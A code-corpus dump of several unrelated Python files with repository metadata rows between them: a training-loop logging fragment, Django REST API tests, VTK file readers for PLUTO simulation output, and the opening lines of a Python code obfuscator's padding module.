'KL {KLD_loss.val:.4f} ({KLD_loss.avg:.4f})'.format(
epoch+1, i, len(Dataset.train_loader), batch_time=batch_time,
data_time=data_time, loss=losses,
cl_loss=class_losses, top1=top1, recon_loss=recon_losses, KLD_loss=kld_losses))
# TensorBoard summary logging
writer.add_scalar('training/train_precision@1', top1.avg, epoch)
writer.add_scalar('training/train_average_loss', losses.avg, epoch)
writer.add_scalar('training/train_KLD', kld_losses.avg, epoch)
writer.add_scalar('training/train_class_loss', class_losses.avg, epoch)
writer.add_scalar('training/train_recon_loss', recon_losses.avg, epoch)
print(' * Train: Loss {loss.avg:.5f} Prec@1 {top1.avg:.3f}'.format(loss=losses, top1=top1))
| 38.481375 | 115 | 0.627476 | 1,726 | 13,430 | 4.75029 | 0.086906 | 0.026345 | 0.029272 | 0.044884 | 0.963654 | 0.949384 | 0.943896 | 0.929748 | 0.920234 | 0.920234 | 0 | 0.015651 | 0.25309 | 13,430 | 348 | 116 | 38.591954 | 0.801715 | 0.294564 | 0 | 0.77193 | 0 | 0.023392 | 0.190331 | 0.071592 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023392 | false | 0 | 0.023392 | 0 | 0.046784 | 0.070175 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f292fac8161bfac7e1e8799b3d11c388ee5b0cc6 | 11,416 | py | Python | api/v1/words_in_sentences/tests/test_views.py | FatliTalk/learnenglish | f0393346f2e696b2af542c05e5005d2495f00e37 | [
"MIT"
] | 1 | 2021-10-06T12:40:28.000Z | 2021-10-06T12:40:28.000Z | api/v1/words_in_sentences/tests/test_views.py | FatliTalk/learnenglish | f0393346f2e696b2af542c05e5005d2495f00e37 | [
"MIT"
] | null | null | null | api/v1/words_in_sentences/tests/test_views.py | FatliTalk/learnenglish | f0393346f2e696b2af542c05e5005d2495f00e37 | [
"MIT"
] | null | null | null | from django.urls import reverse
from django.contrib.auth import get_user_model
from rest_framework import status
from rest_framework.test import APITestCase
from words_in_sentences.models import Sentence
from words_in_sentences.models import Tag
class SentenceViewTests(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username='Jake',
password='testpass123'
)
def test_list_sentences(self):
""" List (get) all sentences object. """
Sentence.objects.create(
english_sentence='First english sentence',
)
url = reverse('api_v1_words_in_sentences:sentence-list')
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data[0]['english_sentence'], 'First english sentence')
# with pagination:
self.assertEqual(
response.data['results'][0]['english_sentence'],
'First english sentence'
)
def test_create_sentence(self):
""" Create (post) a new sentence object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
url = reverse('api_v1_words_in_sentences:sentence-list')
data = {'english_sentence': 'Second english sentence'}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Sentence.objects.count(), 1)
self.assertEqual(Sentence.objects.get().english_sentence, 'Second english sentence')
def test_create_sentence_not_login(self):
""" Not login, can not Create (post) a new sentence object. """
url = reverse('api_v1_words_in_sentences:sentence-list')
data = {'english_sentence': 'An english sentence'}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_retrieve_sentence(self):
""" Retrieve (get) a sentence object. """
sentence = Sentence.objects.create(
english_sentence='Third english sentence',
)
response = self.client.get(
reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,)))
self.assertEqual(response.status_code, status.HTTP_200_OK)
# response.data.english_sentence:
# AttributeError: 'ReturnDict' object has no attribute 'english_sentence'
self.assertEqual(response.data['english_sentence'], 'Third english sentence')
def test_update_sentence(self):
""" Update (put) a sentence object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
sentence = Sentence.objects.create(
english_sentence='Fourth english sentence',
author=self.user
)
url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
data = {'english_sentence': '4th english sentence'}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Sentence.objects.get().english_sentence, '4th english sentence')
def test_update_sentence_not_creator(self):
""" not the sentence's creator, can not Update (put) a sentence object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
sentence = Sentence.objects.create(
english_sentence='An english sentence',
# author=self.user
)
url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
data = {'english_sentence': 'One english sentence'}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_destroy_sentence(self):
""" Destroy (delete) a sentence object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
sentence = Sentence.objects.create(
english_sentence='Fifth english sentence',
author=self.user
)
url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_destroy_sentence_not_creator(self):
""" not the sentence's creator, can not Destroy (delete) a sentence object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
sentence = Sentence.objects.create(
english_sentence='An english sentence',
# author=self.user
)
url = reverse('api_v1_words_in_sentences:sentence-detail', args=(sentence.pk,))
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
class TagViewTests(APITestCase):
@classmethod
def setUpTestData(cls):
cls.user = get_user_model().objects.create_user(
username='Jake',
password='testpass123'
)
cls.admin_user = get_user_model().objects.create_superuser(
username='superadmin',
password='testpass123'
)
def test_list_tags(self):
""" List (get) all tags object. """
Tag.objects.create(
name='First tag',
)
url = reverse('api_v1_words_in_sentences:tag-list')
response = self.client.get(url, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
# self.assertEqual(response.data[0]['name'], 'First tag')
# with pagination:
self.assertEqual(
response.data['results'][0]['name'],
'First tag'
)
def test_create_tag(self):
""" Create (post) a new tag object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
url = reverse('api_v1_words_in_sentences:tag-list')
data = {'name': 'Second tag'}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_201_CREATED)
self.assertEqual(Tag.objects.count(), 1)
self.assertEqual(Tag.objects.get().name, 'Second tag')
def test_create_tag_not_login(self):
""" Not login, can not Create (post) a new tag object. """
url = reverse('api_v1_words_in_sentences:tag-list')
data = {'name': 'A tag'}
response = self.client.post(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_retrieve_tag(self):
""" Retrieve (get) a tag object. """
self.client.login(
username=self.admin_user.username,
password='testpass123'
)
tag = Tag.objects.create(
name='Third tag',
)
response = self.client.get(
reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,)))
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(response.data['name'], 'Third tag')
def test_retrieve_tag_not_admin_user(self):
""" Retrieve (get) a tag object. """
tag = Tag.objects.create(
name='A tag',
)
response = self.client.get(
reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,)))
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_update_tag(self):
""" Update (put) a tag object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.admin_user.username,
password='testpass123'
)
tag = Tag.objects.create(
name='Fourth tag',
)
url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
data = {'name': '4th tag'}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_200_OK)
self.assertEqual(Tag.objects.get().name, '4th tag')
def test_update_tag_not_admin_user(self):
""" not the admin_user, can not Update (put) a tag object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
tag = Tag.objects.create(
name='A tag',
)
url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
data = {'name': 'One tag'}
response = self.client.put(url, data, format='json')
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
def test_destroy_tag(self):
""" Destroy (delete) a tag object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.admin_user.username,
password='testpass123'
)
tag = Tag.objects.create(
name='Fifth tag',
)
url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)
def test_destroy_tag_not_admin_user(self):
""" not the admin_user, can not Destroy (delete) a tag object. """
# The self.client attribute will be an APIClient
# (instead of Django's default Client) instance.
self.client.login(
username=self.user.username,
password='testpass123'
)
tag = Tag.objects.create(
name='An tag',
)
url = reverse('api_v1_words_in_sentences:tag-detail', args=(tag.pk,))
response = self.client.delete(url)
self.assertEqual(response.status_code, status.HTTP_403_FORBIDDEN)
"""
$ python manage.py test api.v1.words_in_sentences.tests.test_views --settings=a_project_config.settings.local
Creating test database for alias 'default'...
System check identified no issues (0 silenced).
.................
----------------------------------------------------------------------
Ran 17 tests in 0.734s
OK
Destroying test database for alias 'default'...
"""
| 40.48227 | 109 | 0.630256 | 1,329 | 11,416 | 5.250564 | 0.097065 | 0.054457 | 0.07581 | 0.030954 | 0.889797 | 0.844081 | 0.777157 | 0.761966 | 0.746202 | 0.735311 | 0 | 0.01498 | 0.251489 | 11,416 | 281 | 110 | 40.626335 | 0.801638 | 0.173003 | 0 | 0.562189 | 0 | 0 | 0.156558 | 0.07162 | 0 | 0 | 0 | 0 | 0.134328 | 1 | 0.094527 | false | 0.069652 | 0.029851 | 0 | 0.134328 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
f296dad22f08c97bdf64eae508a7bae51f999889 | 246 | py | Python | codes/cnn/constants.py | semaraugusto/norm-conflict-classification | 03897326b8c347eb8d2afaed35e843a2c94cc0c8 | [
"Apache-2.0"
] | 1 | 2020-12-07T10:07:41.000Z | 2020-12-07T10:07:41.000Z | codes/cnn/constants.py | semaraugusto/norm-conflict-classification | 03897326b8c347eb8d2afaed35e843a2c94cc0c8 | [
"Apache-2.0"
] | 1 | 2020-02-17T17:01:19.000Z | 2020-03-13T13:14:33.000Z | codes/cnn/constants.py | semaraugusto/norm-conflict-classification | 03897326b8c347eb8d2afaed35e843a2c94cc0c8 | [
"Apache-2.0"
] | 1 | 2020-03-05T12:58:22.000Z | 2020-03-05T12:58:22.000Z | BASE_FOLDER_PATH = 'dataset/'
CLASSIFIER_PATH = 'norm_identifier/classifiers/16-10-25_12:18:39/sentence_classifier_16-10-25_12:18:39.pkl'
NAMES_PATH = 'norm_identifier/classifiers/16-10-25_12:18:39/sentence_classifier_16-10-25_12:18:39_names.txt' | 82 | 108 | 0.829268 | 45 | 246 | 4.2 | 0.4 | 0.084656 | 0.126984 | 0.169312 | 0.751323 | 0.751323 | 0.751323 | 0.751323 | 0.751323 | 0.751323 | 0 | 0.201681 | 0.03252 | 246 | 3 | 108 | 82 | 0.592437 | 0 | 0 | 0 | 0 | 0.666667 | 0.761134 | 0.728745 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
f29a3f3c91b915f902e84064bbb7fa0b07fa1a25 | 172 | py | Python | gecosistema_lite/__init__.py | valluzzi/libcore | 1e714ed0df13000bf853696551ee109b3b65997a | [
"MIT"
] | null | null | null | gecosistema_lite/__init__.py | valluzzi/libcore | 1e714ed0df13000bf853696551ee109b3b65997a | [
"MIT"
] | null | null | null | gecosistema_lite/__init__.py | valluzzi/libcore | 1e714ed0df13000bf853696551ee109b3b65997a | [
"MIT"
] | null | null | null | from execution import *
from filesystem import *
from gdal_shape import *
# from gdal_utils import *
from gdal_wrappers import *
from strings import *
from taudem import *
| 21.5 | 27 | 0.784884 | 24 | 172 | 5.5 | 0.416667 | 0.454545 | 0.318182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.168605 | 172 | 7 | 28 | 24.571429 | 0.923077 | 0.139535 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4b39d475d43676101fbac4f3b3fdc9405c8baa6c | 10,645 | py | Python | pymcfost/plutoTools.py | TomHilder/pymcfost | 90f9e58308ec8a089100b58f805c288acd3527e9 | [
"MIT"
] | 10 | 2018-10-03T10:38:06.000Z | 2022-03-29T23:57:31.000Z | pymcfost/plutoTools.py | TomHilder/pymcfost | 90f9e58308ec8a089100b58f805c288acd3527e9 | [
"MIT"
] | 17 | 2018-10-09T05:01:56.000Z | 2021-06-07T00:00:09.000Z | pymcfost/plutoTools.py | TomHilder/pymcfost | 90f9e58308ec8a089100b58f805c288acd3527e9 | [
"MIT"
] | 13 | 2018-10-08T05:03:50.000Z | 2021-11-11T11:11:36.000Z | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 3 15:23:00 2014
@author: glesur
"""
import numpy as np
class DataStructure:
pass
# Read a vtk file
def readVTKCart(filename):
try:
fid=open(filename,"rb")
except:
print("Can't open file")
return 0
# define our datastructure
V=DataStructure()
# raw data which will be read from the file
V.data={}
#print("Hello")
# datatype we read
dt=np.dtype(">f") # Big endian single precision floats
s=fid.readline() # VTK DataFile Version x.x
s=fid.readline() # Comments
s=fid.readline() # BINARY
s=fid.readline() # DATASET RECTILINEAR_GRID
slist=s.split()
grid_type=str(slist[1],'utf-8')
if(grid_type != "RECTILINEAR_GRID"):
print("ERROR: Wrong VTK file type.")
print("This routine can only open Cartesian or Cylindrical VTK files.")
fid.close()
return 0
s=fid.readline() # DIMENSIONS NX NY NZ
slist=s.split()
#s=fid.readline() # Extre line feed
V.nx=int(slist[1])
V.ny=int(slist[2])
V.nz=int(slist[3])
s=fid.readline() # X_COORDINATES NX float
x=np.fromfile(fid,dt,V.nx)
s=fid.readline() # Extra line feed added by pluto
s=fid.readline() # X_COORDINATES NX float
y=np.fromfile(fid,dt,V.ny)
s=fid.readline() # Extra line feed added by pluto
s=fid.readline() # X_COORDINATES NX float
z=np.fromfile(fid,dt,V.nz)
s=fid.readline() # Extra line feed added by pluto
s=fid.readline() # POINT_DATA NXNYNZ
slist=s.split()
point_type=str(slist[0],'utf-8')
npoints=int(slist[1])
s=fid.readline() # EXTRA LINE FEED
if(point_type == "CELL_DATA"):
# The file contains face coordinates, so we extrapolate to get the cell center coordinates.
if V.nx>1:
V.nx=V.nx-1
V.x=0.5*(x[1:]+x[:-1])
else:
V.x=x
if V.ny>1:
V.ny=V.ny-1
V.y=0.5*(y[1:]+y[:-1])
else:
V.y=y
if V.nz>1:
V.nz=V.nz-1
V.z=0.5*(z[1:]+z[:-1])
else:
V.z=z
elif(point_type == "POINT_DATA"):
V.x=x
V.y=y
V.z=z
if V.nx*V.ny*V.nz != npoints:
print("ERROR: Grid size incompatible with number of points in the data set")
while 1:
s=fid.readline() # SCALARS/VECTORS name data_type (ex: SCALARS imagedata unsigned_char)
#print repr(s)
if len(s)<2: # leave if end of file
break
slist=s.split()
datatype=str(slist[0],'utf-8')
varname=str(slist[1],'utf-8')
if datatype == "SCALARS":
fid.readline() # LOOKUP TABLE
V.data[varname] = np.transpose(np.fromfile(fid,dt,V.nx*V.ny*V.nz).reshape(V.nz,V.ny,V.nx))
elif datatype == "VECTORS":
Q=np.fromfile(fid,dt,3*V.nx*V.ny*V.nz)
V.data[varname+'_X']=np.transpose(Q[::3].reshape(V.nz,V.ny,V.nx))
V.data[varname+'_Y']=np.transpose(Q[1::3].reshape(V.nz,V.ny,V.nx))
V.data[varname+'_Z']=np.transpose(Q[2::3].reshape(V.nz,V.ny,V.nx))
else:
print("ERROR: Unknown datatype %s" % datatype)
break;
fid.readline() #extra line feed
fid.close()
return V
# Read a vtk file
def readVTKPolar(filename):
try:
fid=open(filename,"rb")
except:
print("Can't open file")
return 0
# define our datastructure
V=DataStructure()
# raw data which will be read from the file
V.data={}
#print("Hello")
# datatype we read
dt=np.dtype(">f") # Big endian single precision floats
s=fid.readline() # VTK DataFile Version x.x
s=fid.readline() # Comments
s=fid.readline() # BINARY
s=fid.readline() # DATASET RECTILINEAR_GRID
print(s)
slist=s.split()
grid_type=str(slist[1],'utf-8')
if(grid_type != "STRUCTURED_GRID"):
print("ERROR: Wrong VTK file type.")
print("Current type is: %s"%(grid_type))
print("This routine can only open Polar VTK files.")
fid.close()
return 0
s=fid.readline() # DIMENSIONS NX NY NZ
slist=s.split()
V.nx=int(slist[1])
V.ny=int(slist[2])
V.nz=int(slist[3])
print("nx=%d, ny=%d, nz=%d"%(V.nx,V.ny,V.nz))
s=fid.readline() # POINTS NXNYNZ float
slist=s.split()
npoints=int(slist[1])
points=np.fromfile(fid,dt,3*npoints)
s=fid.readline() # EXTRA LINE FEED
V.points=points
if V.nx*V.ny*V.nz != npoints:
print("ERROR: Grid size incompatible with number of points in the data set")
return 0
# Reconstruct the polar coordinate system
x1d=points[::3]
y1d=points[1::3]
z1d=points[2::3]
xcart=np.transpose(x1d.reshape(V.nz,V.ny,V.nx))
ycart=np.transpose(y1d.reshape(V.nz,V.ny,V.nx))
zcart=np.transpose(z1d.reshape(V.nz,V.ny,V.nx))
r=np.sqrt(xcart[:,0,0]**2+ycart[:,0,0]**2)
theta=np.unwrap(np.arctan2(ycart[0,:,0],xcart[0,:,0]))
z=zcart[0,0,:]
s=fid.readline() # CELL_DATA (NX-1)(NY-1)(NZ-1)
slist=s.split()
data_type=str(slist[0],'utf-8')
if(data_type != "CELL_DATA"):
print("ERROR: this routine expect CELL DATA as produced by PLUTO.")
fid.close()
return 0
s=fid.readline() # Line feed
# Perform averaging on coordinate system to get cell centers
# The file contains face coordinates, so we extrapolate to get the cell center coordinates.
if V.nx>1:
V.nx=V.nx-1
V.x=0.5*(r[1:]+r[:-1])
else:
V.x=r
if V.ny>1:
V.ny=V.ny-1
V.y=(0.5*(theta[1:]+theta[:-1])+np.pi)%(2.0*np.pi)-np.pi
else:
V.y=theta
if V.nz>1:
V.nz=V.nz-1
V.z=0.5*(z[1:]+z[:-1])
else:
V.z=z
while 1:
s=fid.readline() # SCALARS/VECTORS name data_type (ex: SCALARS imagedata unsigned_char)
#print repr(s)
if len(s)<2: # leave if end of file
break
slist=s.split()
datatype=str(slist[0],'utf-8')
varname=str(slist[1],'utf-8')
if datatype == "SCALARS":
fid.readline() # LOOKUP TABLE
V.data[varname] = np.transpose(np.fromfile(fid,dt,V.nx*V.ny*V.nz).reshape(V.nz,V.ny,V.nx))
elif datatype == "VECTORS":
Q=np.fromfile(fid,dt,3*V.nx*V.ny*V.nz)
V.data[varname+'_X']=np.transpose(Q[::3].reshape(V.nz,V.ny,V.nx))
V.data[varname+'_Y']=np.transpose(Q[1::3].reshape(V.nz,V.ny,V.nx))
V.data[varname+'_Z']=np.transpose(Q[2::3].reshape(V.nz,V.ny,V.nx))
else:
print("ERROR: Unknown datatype %s" % datatype)
break;
fid.readline() #extra line feed
fid.close()
return V
# Read a vtk file
def readVTKSpherical(filename):
try:
fid=open(filename,"rb")
except:
print("Can't open file")
return 0
# define our datastructure
V=DataStructure()
# raw data which will be read from the file
V.data={}
#print("Hello")
# datatype we read
dt=np.dtype(">f") # Big endian single precision floats
s=fid.readline() # VTK DataFile Version x.x
s=fid.readline() # Comments
s=fid.readline() # BINARY
s=fid.readline() # DATASET RECTILINEAR_GRID
slist=s.split()
grid_type=str(slist[1],'utf-8')
if(grid_type != "STRUCTURED_GRID"):
print("ERROR: Wrong VTK file type.")
print("This routine can only open Spherical VTK files.")
fid.close()
return 0
s=fid.readline() # DIMENSIONS NX NY NZ
slist=s.split()
V.nx=int(slist[1])
V.ny=int(slist[2])
V.nz=int(slist[3])
if(V.nz==1):
is2d=1
else:
is2d=0
s=fid.readline() # POINTS NXNYNZ float
slist=s.split()
npoints=int(slist[1])
points=np.fromfile(fid,dt,3*npoints)
s=fid.readline() # EXTRA LINE FEED
V.points=points
if V.nx*V.ny*V.nz != npoints:
print("ERROR: Grid size incompatible with number of points in the data set")
return 0
# Reconstruct the spherical coordinate system
x1d=points[::3]
y1d=points[1::3]
z1d=points[2::3]
xcart=np.transpose(x1d.reshape(V.nz,V.ny,V.nx))
ycart=np.transpose(y1d.reshape(V.nz,V.ny,V.nx))
zcart=np.transpose(z1d.reshape(V.nz,V.ny,V.nx))
if(is2d):
r=np.sqrt(xcart[:,0,0]**2+ycart[:,0,0]**2)
phi=np.unwrap(np.arctan2(zcart[0,0,:],xcart[0,0,:]))
theta=np.arccos(ycart[0,:,0]/np.sqrt(xcart[0,:,0]**2+ycart[0,:,0]**2))
else:
r=np.sqrt(xcart[:,0,0]**2+ycart[:,0,0]**2+zcart[:,0,0]**2)
phi=np.unwrap(np.arctan2(ycart[0,0,:],xcart[0,0,:]))
theta=np.arccos(zcart[0,:,0]/np.sqrt(xcart[0,:,0]**2+ycart[0,:,0]**2+zcart[0,:,0]**2))
s=fid.readline() # CELL_DATA (NX-1)(NY-1)(NZ-1)
slist=s.split()
data_type=str(slist[0],'utf-8')
if(data_type != "CELL_DATA"):
print("ERROR: this routine expect CELL DATA as produced by PLUTO.")
fid.close()
return 0
s=fid.readline() # Line feed
# Perform averaging on coordinate system to get cell centers
# The file contains face coordinates, so we extrapolate to get the cell center coordinates.
if V.nx>1:
V.nx=V.nx-1
V.r=0.5*(r[1:]+r[:-1])
else:
V.x=r
if V.ny>1:
V.ny=V.ny-1
V.theta=0.5*(theta[1:]+theta[:-1])
else:
V.y=theta
if V.nz>1:
V.nz=V.nz-1
V.phi=(0.5*(phi[1:]+phi[:-1])+np.pi)%(2.0*np.pi)-np.pi
else:
V.phi=phi
while 1:
s=fid.readline() # SCALARS/VECTORS name data_type (ex: SCALARS imagedata unsigned_char)
#print repr(s)
if len(s)<2: # leave if end of file
break
slist=s.split()
datatype=str(slist[0],'utf-8')
varname=str(slist[1],'utf-8')
if datatype == "SCALARS":
fid.readline() # LOOKUP TABLE
V.data[varname] = np.transpose(np.fromfile(fid,dt,V.nx*V.ny*V.nz).reshape(V.nz,V.ny,V.nx))
elif datatype == "VECTORS":
Q=np.fromfile(fid,dt,3*V.nx*V.ny*V.nz)
V.data[varname+'_X']=np.transpose(Q[::3].reshape(V.nz,V.ny,V.nx))
V.data[varname+'_Y']=np.transpose(Q[1::3].reshape(V.nz,V.ny,V.nx))
V.data[varname+'_Z']=np.transpose(Q[2::3].reshape(V.nz,V.ny,V.nx))
else:
print("ERROR: Unknown datatype %s" % datatype)
break;
fid.readline() #extra line feed
fid.close()
return V
| 28.462567 | 102 | 0.55923 | 1,713 | 10,645 | 3.44892 | 0.102744 | 0.021327 | 0.07109 | 0.033514 | 0.923155 | 0.914861 | 0.898951 | 0.888456 | 0.878639 | 0.878639 | 0 | 0.030096 | 0.27271 | 10,645 | 373 | 103 | 28.538874 | 0.733015 | 0.190418 | 0 | 0.859779 | 0 | 0 | 0.108469 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01107 | false | 0.00369 | 0.00369 | 0 | 0.066421 | 0.073801 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b4bd9c583e0d3f16350ddf3d96c7d333d77cf44 | 95 | py | Python | experiement/multiwoz/torchfly_old_version/utils/__init__.py | RoderickGu/Pretraining_GPT | 0a3ecd38116dc271e273f57490b9b45b660bf401 | [
"Apache-2.0"
] | 4 | 2019-11-18T09:36:04.000Z | 2019-12-11T18:30:16.000Z | experiement/multiwoz/torchfly_old_version/utils/__init__.py | RoderickGu/Pretraining_GPT | 0a3ecd38116dc271e273f57490b9b45b660bf401 | [
"Apache-2.0"
] | null | null | null | experiement/multiwoz/torchfly_old_version/utils/__init__.py | RoderickGu/Pretraining_GPT | 0a3ecd38116dc271e273f57490b9b45b660bf401 | [
"Apache-2.0"
] | null | null | null | from .progress_bar import progress_bar, master_bar
from .set_random_seed import set_random_seed | 47.5 | 50 | 0.884211 | 16 | 95 | 4.8125 | 0.5 | 0.285714 | 0.337662 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.084211 | 95 | 2 | 51 | 47.5 | 0.885057 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4b6170f9bfd4d945175e38dd3fbf19362fdacd9b | 203 | py | Python | snippets/py/array/add/add.py | snippetfinder/The-Quick-Snippet-Reference | 4d2c38cb3687f31428539b6c9cdb11abdd4c6682 | [
"BSL-1.0"
] | 10 | 2022-01-13T15:56:14.000Z | 2022-01-21T20:43:29.000Z | snippets/py/array/add/add.py | snippetfinder/The-Quick-Snippet-Reference | 4d2c38cb3687f31428539b6c9cdb11abdd4c6682 | [
"BSL-1.0"
] | 1 | 2022-01-21T20:33:13.000Z | 2022-01-22T20:26:57.000Z | snippets/py/array/add/add.py | snippetfinder/The-Quick-Snippet-Reference | 4d2c38cb3687f31428539b6c9cdb11abdd4c6682 | [
"BSL-1.0"
] | null | null | null | array = [3, 2]
item = 1
print(array) # [3, 2]
array.append(item) # ≡
print(array) # [3, 2, 1]
# merge:
array = [3, 2]
item = 1
print(array) # [3, 2]
array += [item] # ≡
print(array) # [3, 2, 1] | 16.916667 | 25 | 0.507389 | 36 | 203 | 2.916667 | 0.25 | 0.342857 | 0.4 | 0.457143 | 0.895238 | 0.895238 | 0.895238 | 0.552381 | 0.552381 | 0.552381 | 0 | 0.105263 | 0.251232 | 203 | 12 | 26 | 16.916667 | 0.572368 | 0.216749 | 0 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4b92696e1f3759396763deb57c794769d4d3b47b | 63,618 | py | Python | intensio/core/obfuscation/intensio_padding.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | 1 | 2020-02-25T10:54:44.000Z | 2020-02-25T10:54:44.000Z | intensio/core/obfuscation/intensio_padding.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | intensio/core/obfuscation/intensio_padding.py | Warlockk/Intensio-Obfuscator | befaf1cfd2f7320266f07ef036542413317b3d9b | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# https://github.com/Hnfull/Intensio-Obfuscator
#---------------------------------------------------------- [Lib] -----------------------------------------------------------#
import fileinput
import random
import textwrap
import re
import sys
from progress.bar import Bar
from core.obfuscation.intensio_mixer import Mixer
from core.utils.intensio_utils import Utils
from core.utils.intensio_error import EXIT_SUCCESS, EXIT_FAILURE
#------------------------------------------------- [Function(s)/Class(es)] --------------------------------------------------#
class Padding:
def __init__(self):
self.mixer = Mixer()
self.utils = Utils()
# -- Len of spaces -- #
self.space0 = ""
self.space4 = " "
self.space8 = " "
self.space12 = " "
self.space16 = " "
self.space20 = " "
self.space24 = " "
self.space28 = " "
self.space32 = " "
self.space36 = " "
self.space40 = " "
self.space44 = " "
self.space48 = " "
self.space52 = " "
self.space56 = " "
self.space60 = " "
self.space64 = " "
def ScriptsGenerator(self, mixerLengthArg, mixerLevelArg):
varRandom1 = self.mixer.GetStringMixer(
mixerLengthArgDefined=mixerLengthArg,
